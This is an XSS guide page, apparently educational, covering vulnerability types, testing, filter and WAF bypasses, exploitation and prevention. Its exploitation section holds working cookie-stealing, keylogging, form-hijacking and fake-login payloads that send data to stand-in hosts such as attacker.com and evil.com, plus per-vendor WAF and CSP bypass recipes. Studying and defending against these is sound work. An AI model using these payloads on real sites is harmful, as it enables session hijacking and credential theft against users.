Documentation
Complete XSS security guide â from fundamentals to advanced exploitation and prevention
Educational Purpose Only
This documentation is for authorized security testing and educational use only. Always obtain proper written authorization before testing any systems.
đXSS Fundamentals
What is Cross-Site Scripting?
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When the victim loads the page, the malicious script executes in their browser context.
Steal Session Cookies
Access authentication tokens and hijack user sessions
Perform Actions as User
Execute any action the user can perform on the website
Access Sensitive Data
Read private information displayed on the page
Phishing Attacks
Display fake forms to capture credentials
Malicious Redirects
Redirect users to malicious websites
Network Reconnaissance
Scan internal networks via the browser
Types of XSS Vulnerabilities
đ Reflected XSS
HighPayload is reflected off the web server as part of the response. Typically delivered via URL parameters.
<!-- Vulnerable PHP -->
<h1>Welcome <?php echo $_GET['name']; ?>!</h1>
<!-- Malicious URL -->
https://example.com/welcome.php?name=<script>alert('XSS')</script>đž Stored XSS
CriticalPayload is permanently stored on the target server and served to all users who access the affected page.
<!-- Vulnerable comment display --> <div class="comment"> <p><?php echo $comment['message']; ?></p> </div> <!-- Malicious comment --> <script>document.location="http://evil.com/?c="+document.cookie</script>
đ DOM-Based XSS
HighVulnerability exists in client-side JavaScript. The payload modifies the DOM without server interaction.
// Vulnerable DOM manipulation
var name = location.hash.substring(1);
document.getElementById('welcome').innerHTML = 'Hello ' + name;
// Malicious URL
https://example.com/page.html#<img src=x onerror=alert(1)>Execution Contexts
Understanding where your payload executes is crucial. Different contexts require different approaches:
HTML Context
<div>Hello $userInput</div>
<script>alert("XSS")</script><div>Hello <script>alert("XSS")</script></div>Attribute Context
<input value="$userInput">
" onmouseover="alert('XSS')<input value="" onmouseover="alert('XSS')">JavaScript Context
<script>var x = '$userInput';</script>
';alert('XSS');//<script>var x = '';alert('XSS');//';</script>URL Context
<a href="$userURL">Click</a>
javascript:alert('XSS')<a href="javascript:alert('XSS')">Click</a>CSS Context
<style>body{background:$color}</style>red}</style><script>alert(1)</script>
<style>body{background:red}</style><script>alert(1)</script>đDetection Techniques
Manual Testing Strategy
Manual testing remains one of the most effective ways to discover XSS vulnerabilities.
- 1
Identify all input points: URL params, form fields, HTTP headers, cookies - 2
Test with simple HTML: <h1>test</h1> - 3
Test script execution: <script>alert(1)</script> - 4
Test event handlers: <img src=x onerror=alert(1)> - 5
Test context breaking: "><script>alert(1)</script> - 6
Try advanced payloads: <svg onload=alert(1)> - 7
Test encoding bypasses: %3Cscript%3Ealert(1)%3C/script%3E - 8
Check for DOM-based sinks: innerHTML, document.write, eval
Scanning Tools
Burp Suite Professional
Industry standard web application security testing platform
OWASP ZAP
Free and open-source security testing proxy
XSSStrike
Advanced XSS detection suite with fuzzing capabilities
XSSHunter
Blind XSS detection platform for stored vulnerabilities
Dalfox
Fast XSS scanner and parameter analysis tool
XSSer
Automatic XSS detection and exploitation framework
Fuzzing Strategies
Systematic fuzzing helps discover edge cases that manual testing might miss:
- 1
Start with polyglot payloads that work across multiple contexts - 2
Fuzz special characters: < > " ' / \ ; : = ( ) { } [ ] - 3
Test encoding permutations: URL, HTML entity, Unicode, hex - 4
Try null bytes and control characters as separators - 5
Test length boundaries and truncation behavior - 6
Fuzz HTTP headers: Referer, User-Agent, X-Forwarded-For
đĄī¸Bypass Techniques
Filter Evasion
When basic payloads are blocked, encoding and obfuscation techniques can bypass filters:
Case Manipulation
<ScRiPt>alert(1)</ScRiPt> <SCRIPT>alert(1)</SCRIPT> <script\t>alert(1)</script>
URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E %253Cscript%253Ealert(1)%253C/script%253E
HTML Entity Encoding
<script>alert(1)</script> <script>alert(1)</script>
Unicode Encoding
\u003Cscript\u003Ealert(1)\u003C/script\u003E <\u0073cript>alert(1)</\u0073cript>
Null Byte Injection
<scri\x00pt>alert(1)</script> <img src=x on\x00error=alert(1)>
Comment Insertion
<scr<!---->ipt>alert(1)</script> <img src=x on/**/error=alert(1)>
Alternative Event Handlers
When common event handlers are blocked, try these alternatives:
Mouse Events
onmouseoveronmouseoutonmousedownonmouseuponclickondblclickKeyboard Events
onkeydownonkeyuponkeypressForm Events
onfocusonbluronchangeonsubmitoninputMedia Events
onloadonerroronresizeonscrolloncanplayHTML5 Events
ontoggleonpointeroveronanimationendonautocompleteonwheelWAF Bypass Techniques
Web Application Firewalls implement various rules to block XSS. Here are proven bypass techniques:
âī¸ Cloudflare
# Unicode bypass
<script>alert\u0028\u0031\u0029</script>
# Case variation
<ScRiPt>alert(1)</ScRiPt>
# Encoding combination
<script>eval(atob('YWxlcnQoMSk='))</script>
# Template literals
<script>alert`1`</script>đŠī¸ AWS WAF
# Mixed case with spaces < ScRiPt >alert(1)</ ScRiPt > # Alternative tags <svg onload=alert(1)> <iframe src=javascript:alert(1)> # Event handler variations <img src=x oNlOaD=alert(1)>
đ ModSecurity
# Comment injection
<script>/**/alert(1)</script>
# String concatenation
<script>alert(String.fromCharCode(49))</script>
# Alternative execution
<script>Function('alert(1)')()</script>đˇ Akamai
# Mixed case <ScRiPt>alert(1)</ScRiPt> # Attribute padding <img src =x onerror =alert(1)> # Unicode events <img src=x oN\u0065rror=alert(1)>
CSP Bypasses
Content Security Policy (CSP) is a powerful defense mechanism, but certain configurations can be bypassed:
đĻ JSONP Endpoints
If CSP allows certain domains, look for JSONP endpoints:
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script> <div ng-app ng-csp ng-click=$event.view.alert(1337)>Click</div>
đ Base Tag Injection
Manipulate relative URLs:
<base href="//evil.com/"> <script src="./legitimate-script.js"></script>
đ Nonce/Hash Bypasses
Look for nonce reuse or hash collisions:
# Nonce reuse <script nonce="abc123">alert(1)</script> # Script gadgets on whitelisted CDNs <script src="https://allowed-cdn.com/angular.js"></script>
Advanced Encoding
Various encoding methods can bypass filters that don't properly decode input:
đĸ Numeric Character References
# Decimal <script>alert(1)</script> # Hexadecimal <script>alert(1)</script>
đ Unicode Normalization
# Unicode bypass
<script>alert\u0028\u0031\u0029</script>
# Overlong encoding
<script>eval('\\u{61}\\u{6C}\\u{65}\\u{72}\\u{74}(1)')</script>đĻ Base64 & Alternative
# Base64 payload
<script>eval(atob('YWxlcnQoMSk='))</script>
# FromCharCode
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>⥠Alternative Execution
# Template literals
<script>alert`1`</script>
# Function constructor
<script>[].constructor.constructor('alert(1)')()</script>
# setTimeout
<script>setTimeout('alert(1)',0)</script>đExploitation
Session Hijacking
The most common XSS exploitation technique â stealing session cookies to impersonate users.
// Cookie stealer
new Image().src="https://attacker.com/steal?c="+document.cookie;
// Fetch-based exfiltration
fetch("https://attacker.com/log",{
method:"POST",
body:JSON.stringify({cookies:document.cookie,url:location.href})
});Keylogging & Credential Theft
Capture keystrokes and form submissions to steal credentials.
// Keylogger
document.addEventListener("keypress",function(e){
new Image().src="https://attacker.com/log?k="+e.key;
});
// Form hijacking
document.forms[0].addEventListener("submit",function(){
fetch("https://attacker.com/creds",{
method:"POST", body:new FormData(this)
});
});Phishing via XSS
Inject convincing fake login forms into legitimate websites.
// Inject a fake login overlay document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);display:flex;align-items:center;justify-content:center;z-index:99999"><div style="background:#fff;padding:40px;border-radius:12px;max-width:400px;width:90%"><h2>Session Expired</h2><p>Please log in again</p><form action="https://evil.com/phish"><input name="user" placeholder="Email"><input name="pass" type="password" placeholder="Password"><button>Sign In</button></form></div></div>';
đPrevention
Output Encoding
The primary defense against XSS â encode data before inserting it into the page:
Content Security Policy
CSP is a browser security mechanism that restricts content sources:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-{random}';
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
connect-src 'self' https://api.example.com;
frame-ancestors 'none';
base-uri 'self';Input Validation
Validate and sanitize all user input on both client and server side:
- 1
Use allowlists over denylists wherever possible - 2
Validate data type, length, format, and range - 3
Use parameterized queries / prepared statements - 4
Implement strict Content-Type headers - 5
Set HttpOnly, Secure, SameSite cookie flags - 6
Use modern frameworks with auto-escaping (React, Angular, Vue) - 7
Implement Subresource Integrity (SRI) for external scripts
đ ī¸Tools & Resources
Essential References
Official OWASP prevention guide
Hands-on XSS labs and tutorials
Comprehensive XSS techniques wiki
Massive payload collection on GitHub
Interactive cheat sheet with event handlers
Advanced research techniques
Ready to practice?
Test your knowledge with real XSS payloads in a safe sandbox environment.